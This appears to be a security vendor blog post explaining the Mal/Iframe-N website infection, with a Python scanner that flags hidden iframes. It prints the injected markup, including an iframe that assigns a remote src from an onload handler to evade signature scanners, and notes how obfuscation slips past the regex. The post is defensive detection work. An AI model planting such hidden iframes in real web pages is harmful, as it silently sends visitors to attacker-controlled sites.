Mal/Iframe-N: The next big threat?

Since releasing detection for Mal/Iframe-N on Wednesday (21st Oct), SophosLabs has seen a rising number of detections, now running into thousands of affected websites. A couple of the sites hit are well known, and one that I previously talked about as having been infected is the official Van Morrison site.

Even though the site is effectively down for improvement, it is still infected!

I thought that I would take some time to explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, a malicious iframe has the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number, so the frame is effectively invisible on the page.

In the new attack there is no direct src= attribute at all; the address is assigned from an onload= handler instead, like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

This matters for detection: a scanner that looks for an iframe tag carrying a suspicious src= attribute sees nothing, because the src only exists once the browser has loaded the (initially empty) frame and run the handler. The if (!this.src) guard stops the handler from doing anything a second time, since assigning src triggers another load event.

All the domains used so far have been based in Russia.

The tool being used to inject these iframes currently appends them to the end of the legitimate HTML, which is itself worth checking for: markup that appears after a page's own closing tags deserves a closer look.
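To make the two shapes concrete, here is a small scanner, added here as an illustration and not SophosLabs' own detection logic, that walks an HTML document and flags both the classic tiny src= iframe and the srcless onload= variant described above, and also records whether the tag turned up after the page's closing </html>. The 10px "tiny" threshold, the IframeAuditor/scan names and the sample page are assumptions for this example; DOMAIN.TLD is the placeholder from the post.

```python
import re
from html.parser import HTMLParser

# Assumption for this example: a frame 10px or smaller in either dimension
# is treated as "hidden". The post only says N is "a small number".
TINY_PX = 10

# this.src='...' / this.src="..." assignments inside an onload handler
ONLOAD_SRC_RE = re.compile(r"""this\.src\s*=\s*['"]([^'"]+)['"]""", re.I)
# this.width=N / this.height=N assignments inside an onload handler
ONLOAD_DIM_RE = re.compile(r"""this\.(width|height)\s*=\s*['"]?(\d+)""", re.I)


def _px(value):
    """Return an integer pixel count from '1', ' 1px ' etc., or None (e.g. '100%')."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)\s*(?:px)?\s*$", str(value), re.I)
    return int(m.group(1)) if m else None


def _tiny(width, height):
    """True if any known dimension is at or below the hidden-frame threshold."""
    return any(d is not None and d <= TINY_PX for d in (width, height))


class IframeAuditor(HTMLParser):
    """Collect iframes that are tiny with a static src, or that set src from onload."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.html_closed = False  # set once </html> has been seen

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # html.parser lower-cases names and strips quotes
        src, onload = a.get("src"), a.get("onload") or ""
        width, height = _px(a.get("width")), _px(a.get("height"))
        line, _ = self.getpos()

        if src is None:
            # Second form: no src in the markup at all, so a signature keyed on
            # 'iframe src=' never fires; the handler assigns it when the empty
            # frame's load event runs. Flag it regardless of size.
            m = ONLOAD_SRC_RE.search(onload)
            if not m:
                return  # srcless iframe with no src assignment: not this pattern
            for dim, n in ONLOAD_DIM_RE.findall(onload):
                if dim.lower() == "width":
                    width = int(n)
                else:
                    height = int(n)
            kind, url = "onload", m.group(1)
        elif _tiny(width, height):
            # Classic form: a real src, hidden by tiny width/height.
            kind, url = "src", src
        else:
            return  # ordinary embed (video player, map, ...): leave it alone

        self.findings.append({
            "kind": kind,
            "url": url,
            "width": width,
            "height": height,
            "line": line,
            "after_html": self.html_closed,  # injected after the page's own </html>?
        })


def scan(html):
    """Return a list of findings for the given HTML document."""
    p = IframeAuditor()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page (not a real infected site). DOMAIN.TLD is the
# placeholder used in the post.
SAMPLE = """<html><head><title>Band site</title></head>
<body>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src=http://DOMAIN.TLD width=1 height=1>
</body></html>
<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=1; this.width=1;}">
"""

if __name__ == "__main__":
    for f in scan(SAMPLE):
        where = "after </html>" if f["after_html"] else "inside document"
        print(f"line {f['line']}: {f['kind']}-form iframe -> {f['url']} "
              f"({f['width']}x{f['height']}, {where})")
```

The legitimate video embed is left alone, the 1x1 src= frame is reported, and the onload= frame is reported even though the static markup contains no src at all. Note the obvious limitation: the handler is matched with a plain regular expression, so an attacker who obfuscates the assignment (string concatenation, this['src'], an external script) slips past it; that is why srcless iframes in a document, and anything appended after </html>, are worth reviewing on their own.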